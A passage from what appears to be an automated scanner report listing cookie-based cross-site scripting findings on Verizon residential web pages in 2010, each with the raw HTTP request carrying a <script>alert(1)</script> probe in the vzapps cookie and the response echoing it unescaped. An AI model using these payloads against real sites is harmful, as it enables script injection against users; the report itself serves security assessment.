Cookie: Source=CHSI; vzapps=STATE=TXab07d<script>alert(1)</script>4c69398d6d5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69363
Expires: Sat, 20 Nov 2010 00:14:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=TXab07d<script>alert(1)</script>4c69398d6d5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:22 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAB07D<SCRIPT>ALERT(1)</SCRIPT>4C69398D6D5 </DIV>
...[SNIP]...

3.155. http://www22.verizon.com/Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f710f'><script>alert(1)</script>e2fd98d03b8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/CheckAvailability/CheckAvailability.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXf710f'><script>alert(1)</script>e2fd98d03b8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 57182
Expires: Sat, 20 Nov 2010 00:09:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:46 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXf710f'><script>alert(1)</script>e2fd98d03b8; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet | Check Availability
</title><meta name="keywords" content="fios internet check availability, fios availability, fios check
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXF710F'><SCRIPT>ALERT(1)</SCRIPT>E2FD98D03B8 ' />
...[SNIP]...

3.156. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 72540<script>alert(1)</script>7d82b6fd3cc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX72540<script>alert(1)</script>7d82b6fd3cc; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69784
Expires: Sat, 20 Nov 2010 00:12:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=TX72540<script>alert(1)</script>7d82b6fd3cc; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX72540<SCRIPT>ALERT(1)</SCRIPT>7D82B6FD3CC </DIV>
...[SNIP]...

3.157. http://www22.verizon.com/Residential/FiOSInternet/Equipment/Equipment.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 217f0'><script>alert(1)</script>c757f2d9905 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX217f0'><script>alert(1)</script>c757f2d9905; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69788
Expires: Sat, 20 Nov 2010 00:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:10 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=TX217f0'><script>alert(1)</script>c757f2d9905; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:09 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX217F0'><SCRIPT>ALERT(1)</SCRIPT>C757F2D9905 ' />
...[SNIP]...

3.158. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8f35d<script>alert(1)</script>666a41a49d0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8f35d<script>alert(1)</script>666a41a49d0; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 114983
Expires: Sat, 20 Nov 2010 00:10:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8f35d<script>alert(1)</script>666a41a49d0; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8F35D<SCRIPT>ALERT(1)</SCRIPT>666A41A49D0 </DIV>
...[SNIP]...

3.159. http://www22.verizon.com/Residential/FiOSInternet/FAQ/FAQ.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 77bd6'><script>alert(1)</script>866fecce315 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX77bd6'><script>alert(1)</script>866fecce315; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 113390
Expires: Sat, 20 Nov 2010 00:09:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:44 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX77bd6'><script>alert(1)</script>866fecce315; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | FiOS Internet: FAQs
</title><meta name="keywords" content="FiOS Internet FAQs, fios faqs, verizon fios faqs, fios details, fios informatio
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX77BD6'><SCRIPT>ALERT(1)</SCRIPT>866FECCE315 ' />
...[SNIP]...

3.160. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78bda'><script>alert(1)</script>c540e06163e was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX78bda'><script>alert(1)</script>c540e06163e; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75663
Expires: Sat, 20 Nov 2010 00:11:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:57 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=TX78bda'><script>alert(1)</script>c540e06163e; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:57 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX78BDA'><SCRIPT>ALERT(1)</SCRIPT>C540E06163E ' />
...[SNIP]...

3.161. http://www22.verizon.com/Residential/FiOSInternet/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 6e62f<script>alert(1)</script>a74e7065845 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX6e62f<script>alert(1)</script>a74e7065845; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 75659
Expires: Sat, 20 Nov 2010 00:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=TX6e62f<script>alert(1)</script>a74e7065845; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:08 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

<script type="text/javasc
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX6E62F<SCRIPT>ALERT(1)</SCRIPT>A74E7065845 </DIV>
...[SNIP]...

3.162. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e17ad'><script>alert(1)</script>33b4d098683 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXe17ad'><script>alert(1)</script>33b4d098683; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119104
Expires: Sat, 20 Nov 2010 00:14:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:04 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=TXe17ad'><script>alert(1)</script>33b4d098683; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXE17AD'><SCRIPT>ALERT(1)</SCRIPT>33B4D098683 ' />
...[SNIP]...

3.163. http://www22.verizon.com/Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload af6d8<script>alert(1)</script>b1212cf33ee was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/FiOSvsCable/FiOSvsCable.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXaf6d8<script>alert(1)</script>b1212cf33ee; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119100
Expires: Sat, 20 Nov 2010 00:14:16 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:16 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=TXaf6d8<script>alert(1)</script>b1212cf33ee; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAF6D8<SCRIPT>ALERT(1)</SCRIPT>B1212CF33EE </DIV>
...[SNIP]...

3.164. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1de'><script>alert(1)</script>c5602c17654 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8d1de'><script>alert(1)</script>c5602c17654; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 00:13:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX8d1de'><script>alert(1)</script>c5602c17654; path=/
